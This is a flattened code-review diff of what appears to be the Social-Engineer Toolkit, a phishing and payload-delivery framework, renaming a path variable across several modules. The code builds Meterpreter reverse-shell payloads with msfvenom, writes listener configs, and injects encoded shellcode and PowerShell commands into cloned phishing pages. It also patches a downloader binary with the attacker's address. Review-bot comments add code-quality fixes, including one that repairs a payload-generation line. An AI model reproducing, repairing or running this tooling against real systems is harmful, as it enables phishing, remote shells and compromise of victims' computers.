filewrite.write("TEMPLATE=CUSTOM") filewrite.write("TEMPLATE=CUSTOM")
filewrite.close() filewrite.close()
time.sleep(1) time.sleep(1)
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % ( subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (
setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child = pexpect.spawn("python src/html/web_server.py") child = pexpect.spawn("python src/html/web_server.py")
# if we are using apache # if we are using apache
@ -329,13 +329,13 @@ if exploit == "dll_hijacking":
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % subprocess.Popen("cp src/html/msf.exe %s/x.exe" %
(apache_path), shell=True).wait() (apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(userconfigpath + "meta_config"):
# if we aren't using the infectious method then do normal routine # if we aren't using the infectious method then do normal routine
if not os.path.isfile("%s/fileformat.file" % (setdir)): if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
print_info("This may take a few to load MSF...") print_info("This may take a few to load MSF...")
try: try:
child1 = pexpect.spawn( child1 = pexpect.spawn(
"%smsfconsole -L -r %s/meta_config" % (meta_path, setdir)) "%smsfconsole -L -r %s/meta_config" % (meta_path, userconfigpath))
except: except:
try: try:
child1.close() child1.close()
@ -344,7 +344,7 @@ if exploit == "dll_hijacking":
# get the emails out # get the emails out
# if we aren't using the infectious method then do the normal routine # if we aren't using the infectious method then do the normal routine
if not os.path.isfile("%s/fileformat.file" % (setdir)): if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
sys.path.append("src/phishing/smtp/client/") sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1) debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try: try:
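Review bot: The mechanical replacement at L399 left `os.path.isfile(userconfigpath + "" + outfile)`, an empty-string concatenation where the old `"/"` was; it works only because concatenation in this file assumes core.userconfigpath ends with a separator, whereas `"%s/fileformat.file" % (userconfigpath)` at L448, L465 and L476 and `"%smsfconsole -r %s/template.rc" % (meta_path, userconfigpath)` at L391 add their own slash, so the same directory is addressed two different ways in this hunk set (the context line L385, `output.replace("//", "/")`, papers over the doubled slash in one place only). `os.path.isfile(os.path.join(userconfigpath, outfile))` does not depend on how userconfigpath is terminated, and the same form applies to L379-L381, L386, L425, L429, L437, L441, L449, L452 and L463. The `while a == 1:` loop at L394 and the surrounding `if exploit_counter == 0:` block extend beyond this hunk.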


@ -53,27 +53,27 @@ attack_vector = 0
linosx = 0 linosx = 0
multiattack = "" multiattack = ""
# grab attack vector # grab attack vector
if os.path.isfile(setdir + "/attack_vector"): if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(setdir + "/attack_vector", "r") fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
if line == "java": if line == "java":
attack_vector = "java" attack_vector = "java"
if line == "multiattack": if line == "multiattack":
attack_vector = "multiattack" attack_vector = "multiattack"
multiattack = open(setdir + "/multi_payload", "w") multiattack = open(userconfigpath + "multi_payload", "w")
# here is a place holder for the multi attack java # here is a place holder for the multi attack java
# multiattack outputs a file called multi_java if # multiattack outputs a file called multi_java if
# this file is present it will allow additional # this file is present it will allow additional
# functionality # functionality
multiattack_java = "off" multiattack_java = "off"
if os.path.isfile(setdir + "/multi_java"): if os.path.isfile(userconfigpath + "multi_java"):
multiattack_java = "on" multiattack_java = "on"
# custom payloadgen # custom payloadgen
payloadgen = "regular" payloadgen = "regular"
if os.path.isfile(setdir + "/payloadgen"): if os.path.isfile(userconfigpath + "payloadgen"):
payloadgen = "solo" payloadgen = "solo"
# #
@ -117,8 +117,8 @@ try:
choice1 = "" choice1 = ""
# this is port # this is port
choice3 = "" choice3 = ""
if os.path.isfile(setdir + "/meterpreter_reverse_tcp_exe"): if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"):
fileopen = open(setdir + "/meterpreter_reverse_tcp_exe", "r") fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r")
for line in fileopen: for line in fileopen:
# this reads in the first line of the file which happens to be port # this reads in the first line of the file which happens to be port
# when calling through core # when calling through core
@ -182,7 +182,7 @@ try:
encoder = 'false' encoder = 'false'
payloadgen = 'solo' payloadgen = 'solo'
encode_stop = 1 encode_stop = 1
filewrite = open(setdir + "/set.payload", "w") filewrite = open(userconfigpath + "set.payload", "w")
# select setshell # select setshell
if choice1 == '3': if choice1 == '3':
filewrite.write("SETSHELL") filewrite.write("SETSHELL")
@ -217,11 +217,11 @@ try:
# if we are using our own executable # if we are using our own executable
if custom == 1: if custom == 1:
check_write = open(setdir + "/custom.exe", "w") check_write = open(userconfigpath + "custom.exe", "w")
check_write.write("VALID") check_write.write("VALID")
check_write.close() check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe") shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("msf.exe", setdir + "/msf.exe") shutil.copyfile("msf.exe", userconfigpath + "msf.exe")
# Specify Encoding Option # Specify Encoding Option
encoder = "false" encoder = "false"
@ -232,12 +232,12 @@ try:
if choice1 != "set/reverse_shell": if choice1 != "set/reverse_shell":
# we need to rewrite index.html real quick because it has a parameter # we need to rewrite index.html real quick because it has a parameter
# that could get confusing # that could get confusing
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
data = fileopen.read() data = fileopen.read()
data = data.replace("freehugs", "") data = data.replace("freehugs", "")
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
filewrite = open(setdir + "/web_clone/index.html", "w") filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(data) filewrite.write(data)
filewrite.close() filewrite.close()
@ -276,7 +276,7 @@ try:
# if we are using the SET interactive shell then do this # if we are using the SET interactive shell then do this
if choice1 == "set/reverse_shell": if choice1 == "set/reverse_shell":
encoder = "false" encoder = "false"
filewrite = open(setdir + "/set.payload.posix", "w") filewrite = open(userconfigpath + "set.payload.posix", "w")
filewrite.write("true") filewrite.write("true")
filewrite.close() filewrite.close()
import src.core.payloadprep import src.core.payloadprep
@ -330,7 +330,7 @@ try:
if choice1 == "shellcode/alphanum": if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...") print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...")
subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, setdir), shell=True).wait() subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi": if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi":
# here we update set options to specify pyinjection and multipy # here we update set options to specify pyinjection and multipy
@ -339,16 +339,16 @@ try:
# define, this will eventually be all of our payloads # define, this will eventually be all of our payloads
multipyinject_payload = "" multipyinject_payload = ""
# clean up old file # clean up old file
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
os.remove("%s/meta_config_multipyinjector" % (setdir)) os.remove("%s/meta_config_multipyinjector" % (userconfigpath))
# remove any old payload options # remove any old payload options
if os.path.isfile(setdir + "/payload.options.shellcode"): if os.path.isfile(userconfigpath + "payload.options.shellcode"):
os.remove(setdir + "/payload_options.shellcode") os.remove(userconfigpath + "payload_options.shellcode")
# this is the file that gets saved with the payload and # this is the file that gets saved with the payload and
# port options # port options
if choice1 != "cmd/multi": payload_options = open(setdir + "/payload_options.shellcode", "a") if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a")
while 1: while 1:
# don't need any options here # don't need any options here
@ -385,8 +385,8 @@ try:
# here we prep our meta config to listen on all # here we prep our meta config to listen on all
# the ports we want - free hugs all around # the ports we want - free hugs all around
filewrite = open("%s/meta_config_multipyinjector" % (setdir), "a") filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a")
port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port) port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port)
if port_check == False: if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port)) filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port))
filewrite.close() filewrite.close()
@ -453,7 +453,7 @@ try:
shellcode = encryptAES(secret, multipyinject_payload) shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.") print_status("Dynamic cipher key created and embedded into payload.")
filewrite = open("%s/meterpreter.alpha_decoded" % (setdir), "w") filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w")
filewrite.write(shellcode) filewrite.write(shellcode)
filewrite.close() filewrite.close()
@ -462,7 +462,7 @@ try:
payload_options.close() payload_options.close()
# here we are going to encode the payload via base64 # here we are going to encode the payload via base64
fileopen = open("%s/meterpreter.alpha_decoded" % (setdir), "r") fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r")
data = fileopen.read() data = fileopen.read()
if payloadgen != "solo": if payloadgen != "solo":
# base64 1 # base64 1
@ -489,7 +489,7 @@ try:
# last one # last one
data = base64.b64encode(b'data') data = base64.b64encode(b'data')
# #
filewrite = open("%s/meterpreter.alpha" % (setdir), "w") filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w")
filewrite.write(str(data)) filewrite.write(str(data))
filewrite.close() filewrite.close()
if choice1 == "shellcode/alphanum": if choice1 == "shellcode/alphanum":
@ -510,17 +510,17 @@ try:
# write out the payload # write out the payload
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject": if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject":
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(fileopen) filewrite.write(fileopen)
filewrite.close() filewrite.close()
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
# we need to read in the old index.html file because its # we need to read in the old index.html file because its
# already generated, need to present the alphanum to it # already generated, need to present the alphanum to it
if os.path.isfile("%s/web_clone/index.html" % (setdir)): if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
fileopen = open("%s/web_clone/index.html" %(setdir), "r") fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
fileopen2 = open("%s/meterpreter.alpha" % (setdir), "r") fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r")
alpha_shellcode = fileopen2.read().rstrip() alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read() data = fileopen.read()
data = data.replace( data = data.replace(
@ -539,7 +539,7 @@ try:
if choice1 == "shellcode/pyinject": if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..") print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..") print_status("Base64 encoding shellcode and prepping for delivery..")
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
if choice9 == "windows/meterpreter/reverse_tcp_allports": if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1" portnum = "LPORT=1"
choice3 = "1" choice3 = "1"
@ -551,7 +551,7 @@ try:
choice1 = choice9 choice1 = choice9
# write out the payload for powershell injection to pick it up if used # write out the payload for powershell injection to pick it up if used
filewrite = open(setdir + "/metasploit.payload", "w") filewrite = open(userconfigpath + "metasploit.payload", "w")
filewrite.write(choice1) filewrite.write(choice1)
filewrite.close() filewrite.close()
# import if on # import if on
@ -563,12 +563,12 @@ try:
setshell_counter = 1 setshell_counter = 1
if setshell_counter == 0: if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum": if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (setdir)): if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
if choice1 != "cmd/multi": if choice1 != "cmd/multi":
try: core.module_reload(src.payloads.powershell.prep) try: core.module_reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep except: import src.payloads.powershell.prep
if os.path.isfile("%s/x86.powershell" % (setdir)): if os.path.isfile("%s/x86.powershell" % (userconfigpath)):
fileopen1 = open("%s/x86.powershell" % (setdir), "r") fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r")
x86 = fileopen1.read() x86 = fileopen1.read()
x86 = "powershell -ec " + x86 x86 = "powershell -ec " + x86
@ -586,8 +586,8 @@ try:
print_status("Embedding commands into Java Applet parameters...") print_status("Embedding commands into Java Applet parameters...")
print_status("Note that these will be base64-encoded once, regardless of the payload..") print_status("Note that these will be base64-encoded once, regardless of the payload..")
fileopen3 = open("%s/web_clone/index.html" % (setdir), "r") fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read() data = fileopen3.read()
# encode once, will need to decode later # encode once, will need to decode later
@ -605,19 +605,19 @@ try:
filewrite.write(data) filewrite.write(data)
filewrite.close() filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, shell=True).wait() subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait()
# here we specify the binary to deploy if we are using ones that are # here we specify the binary to deploy if we are using ones that are
# required to drop binaries # required to drop binaries
if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi": if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi":
fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r") fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read() data = fileopen3.read()
# check if we don't want to deploy binaries # check if we don't want to deploy binaries
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"') data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data) filewrite.write(data)
filewrite.close() filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# specify attack vector as SET interactive shell # specify attack vector as SET interactive shell
if choice1 == "set/reverse_shell": if choice1 == "set/reverse_shell":
@ -657,7 +657,7 @@ try:
if osx_path != "": if osx_path != "":
# copy the payload # copy the payload
shutil.copyfile(osx_path, setdir + "/mac.bin") shutil.copyfile(osx_path, userconfigpath + "mac.bin")
# if linux payload # if linux payload
if lin_path != "": if lin_path != "":
@ -672,7 +672,7 @@ try:
if lin_path != "": if lin_path != "":
# copy the payload # copy the payload
shutil.copyfile(lin_path, setdir + "/nix.bin") shutil.copyfile(lin_path, userconfigpath + "nix.bin")
else: else:
@ -680,9 +680,9 @@ try:
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=") osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=") linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
print_status("Generating OSX payloads through Metasploit...") print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...") print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on": if multiattack_java == "on":
multiattack.write("OSX=" + str(port1) + "\n") multiattack.write("OSX=" + str(port1) + "\n")
multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload)) multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload))
@ -691,24 +691,24 @@ try:
osxcheck = check_options("MAC.BIN=") osxcheck = check_options("MAC.BIN=")
linuxcheck = check_options("NIX.BIN=") linuxcheck = check_options("NIX.BIN=")
shutil.copyfile(setdir + "/mac.bin", setdir + "/web_clone/%s" % (osxcheck)) shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck))
shutil.copyfile(setdir + "/nix.bin", setdir + "/web_clone/%s" % (linuxcheck)) shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck))
# try block here # try block here
try: try:
# if they want a listener, start here # if they want a listener, start here
if os.path.isfile("%s/meta_config" % (setdir)): if os.path.isfile("%s/meta_config" % (userconfigpath)):
# if its already created # if its already created
filewrite = open("%s/meta_config" % (setdir), "a") filewrite = open("%s/meta_config" % (userconfigpath), "a")
if not os.path.isfile("%s/meta_config" % (setdir)): if not os.path.isfile("%s/meta_config" % (userconfigpath)):
# if we need to create it # if we need to create it
filewrite = open("%s/meta_config" % (setdir), "w") filewrite = open("%s/meta_config" % (userconfigpath), "w")
# if there isn't a multiattack metasploit, setup handler # if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/multi_meta" % (setdir)): if not os.path.isfile("%s/multi_meta" % (userconfigpath)):
port_check = check_ports("%s/meta_config" % (setdir), choice3) port_check = check_ports("%s/meta_config" % (userconfigpath), choice3)
if port_check == False: if port_check == False:
filewrite.write("use exploit/multi/handler\n") filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD " + choice1 + "\n") filewrite.write("set PAYLOAD " + choice1 + "\n")
@ -726,10 +726,10 @@ try:
# config option for using multiscript meterpreter # config option for using multiscript meterpreter
if meterpreter_multi == "ON": if meterpreter_multi == "ON":
multiwrite = open(setdir + "/multi_meter.file", "w") multiwrite = open(userconfigpath + "multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command) multiwrite.write(meterpreter_multi_command)
filewrite.write( filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir)) "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
multiwrite.close() multiwrite.close()
filewrite.write("exploit -j\r\n\r\n") filewrite.write("exploit -j\r\n\r\n")
@ -759,10 +759,10 @@ try:
filewrite.write("set LPORT " + port2 + "\n") filewrite.write("set LPORT " + port2 + "\n")
if linux_meterpreter_multi == "ON": if linux_meterpreter_multi == "ON":
multiwrite = open( multiwrite = open(
setdir + "/lin_multi_meter.file", "w") userconfigpath + "lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command) multiwrite.write(linux_meterpreter_multi_command)
filewrite.write( filewrite.write(
"set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (setdir)) "set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath))
multiwrite.close() multiwrite.close()
filewrite.write("set ExitOnSession false\n") filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n") filewrite.write("exploit -j\r\n\r\n")
@ -781,11 +781,11 @@ except KeyboardInterrupt:
# finish closing up the remenant files # finish closing up the remenant files
if attack_vector == "multiattack": if attack_vector == "multiattack":
multiattack.close() multiattack.close()
if os.path.isfile("%s/fileformat.file" % (setdir)): if os.path.isfile("%s/fileformat.file" % (userconfigpath)):
filewrite = open("%s/payload.options" % (setdir), "w") filewrite = open("%s/payload.options" % (userconfigpath), "w")
filewrite.write(choice1 + " " + ipaddr + " " + choice3) filewrite.write(choice1 + " " + ipaddr + " " + choice3)
filewrite.close() filewrite.close()
if choice1 == "set/reverse_shell": if choice1 == "set/reverse_shell":
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(userconfigpath + "meta_config"):
os.remove(setdir + "/meta_config") os.remove(userconfigpath + "meta_config")
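Review bot: The OSX msfvenom line in the `-680` hunk, `r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath)`, has five `%s` placeholders but six arguments, so the `%` formatting raises `TypeError` before `Popen` is reached; the Linux line directly below starts with `%smsfvenom`, and this one should too: `r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin"`. Separately, the rewrite mixes two path conventions in the same section: `userconfigpath + "meta_config"` only works if `userconfigpath` ends in a separator, while `"%s/meta_config" % (userconfigpath)` adds its own, so if that trailing separator is ever dropped the concatenation form silently targets a different file (e.g. `~/.setmeta_config`); `os.path.join(userconfigpath, "meta_config")` is correct either way. The `-339` hunk also carries over the pre-existing name mismatch between the `isfile` check on `payload.options.shellcode` and the `remove`/`open` on `payload_options.shellcode`, which appears to mean the stale-options cleanup never runs and the file opened in `"a"` mode keeps accumulating across runs. The enclosing `try:` block starts and ends outside these hunks.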


@ -16,14 +16,14 @@ meta_path = meta_path()
def payload_generate(payload, lhost, port): def payload_generate(payload, lhost, port):
# generate metasploit # generate metasploit
subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" % subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" %
(payload, lhost, port, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait() (payload, lhost, port, userconfigpath), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
# write out the rc file # write out the rc file
filewrite = open(setdir + "/meta_config", "w") filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write( filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port)) "use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port))
filewrite.close() filewrite.close()
print_status( print_status(
"Payload has been exported to the default SET directory located under: " + setdir + "/payload.exe") "Payload has been exported to the default SET directory located under: " + userconfigpath + "payload.exe")
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2) show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
payload = (raw_input(setprompt(["4"], ""))) payload = (raw_input(setprompt(["4"], "")))
@ -49,4 +49,4 @@ if check_options("INFECTION_MEDIA=") != "ON":
print_status( print_status(
"Launching msfconsole, this could take a few to load. Be patient...") "Launching msfconsole, this could take a few to load. Be patient...")
subprocess.Popen(meta_path + "msfconsole -r " + subprocess.Popen(meta_path + "msfconsole -r " +
setdir + "/meta_config", shell=True).wait() userconfigpath + "meta_config", shell=True).wait()
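Review bot: `payload_generate` now builds paths two different ways within a few lines: `%s/payload.exe` inserts a separator, while `userconfigpath + "meta_config"` and the status message `userconfigpath + "payload.exe"` assume `userconfigpath` already ends in one, so the message and the file written can disagree about where the payload is depending on that trailing character. Using `os.path.join(userconfigpath, "meta_config")` and `os.path.join(userconfigpath, "payload.exe")` in all four places, including the `msfconsole -r` invocation at the end of the section, removes the dependence. The function also has no docstring; a one-liner such as `"""Generate payload.exe via msfvenom and write the matching multi/handler rc file into userconfigpath."""` would replace the bare `# generate metasploit` comment. The function body continues past the first hunk, and the `if` at the second hunk starts outside it.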


@ -43,12 +43,12 @@ for line in fileopen:
"\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config") "\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config")
# make directory if it's not there # make directory if it's not there
if not os.path.isdir(setdir + "/web_clone/"): if not os.path.isdir(userconfigpath + "web_clone/"):
os.makedirs(setdir + "/web_clone/") os.makedirs(userconfigpath + "web_clone/")
# grab ip address and SET web server interface # grab ip address and SET web server interface
if os.path.isfile(setdir + "/interface"): if os.path.isfile(userconfigpath + "interface"):
fileopen = open(setdir + "interface", "r") fileopen = open(userconfigpath + "interface", "r")
for line in fileopen: for line in fileopen:
ipaddr = line.rstrip() ipaddr = line.rstrip()
@ -94,8 +94,8 @@ webserver = exe_name + " " + webserver
# this is generated through payloadgen.py and lets SET know if its a RATTE # this is generated through payloadgen.py and lets SET know if its a RATTE
# payload or SET payload # payload or SET payload
if os.path.isfile(setdir + "/set.payload"): if os.path.isfile(userconfigpath + "set.payload"):
fileopen = open(setdir + "/set.payload", "r") fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen: for line in fileopen:
payload_selection = line.rstrip() payload_selection = line.rstrip()
else: else:
@ -105,7 +105,7 @@ else:
# determine if we want to target osx/nix as well # determine if we want to target osx/nix as well
posix = False posix = False
# find if we selected it # find if we selected it
if os.path.isfile(setdir + "/set.payload.posix"): if os.path.isfile(userconfigpath + "set.payload.posix"):
# if we have then claim true # if we have then claim true
posix = True posix = True
@ -114,20 +114,20 @@ if payload_selection == "SETSHELL":
# replace ipaddress with one that we need for reverse connection back # replace ipaddress with one that we need for reverse connection back
fileopen = open("src/payloads/set_payloads/downloader.windows", "rb") fileopen = open("src/payloads/set_payloads/downloader.windows", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
host = int(len(exe_name) + 1) * "X" host = int(len(exe_name) + 1) * "X"
webserver_count = int(len(webserver) + 1) * "S" webserver_count = int(len(webserver) + 1) * "S"
ipaddr_count = int(len(ipaddr) + 1) * "M" ipaddr_count = int(len(ipaddr) + 1) * "M"
filewrite.write(data.replace(str(host), exe_name + "\x00", 1)) filewrite.write(data.replace(str(host), exe_name + "\x00", 1))
filewrite.close() filewrite.close()
fileopen = open(setdir + "/msf.exe", "rb") fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(data.replace(str(webserver_count), webserver + "\x00", 1)) filewrite.write(data.replace(str(webserver_count), webserver + "\x00", 1))
filewrite.close() filewrite.close()
fileopen = open(setdir + "/msf.exe", "rb") fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(data.replace(str(ipaddr_count), ipaddr + "\x00", 1)) filewrite.write(data.replace(str(ipaddr_count), ipaddr + "\x00", 1))
filewrite.close() filewrite.close()
@ -135,14 +135,14 @@ if payload_selection == "SETSHELL":
if payload_selection == "RATTE": if payload_selection == "RATTE":
fileopen = open("src/payloads/ratte/ratte.binary", "rb") fileopen = open("src/payloads/ratte/ratte.binary", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
host = int(len(ipaddr) + 1) * "X" host = int(len(ipaddr) + 1) * "X"
rPort = int(len(str(port)) + 1) * "Y" rPort = int(len(str(port)) + 1) * "Y"
filewrite.write(data.replace(str(host), ipaddr + "\x00", 1)) filewrite.write(data.replace(str(host), ipaddr + "\x00", 1))
filewrite.close() filewrite.close()
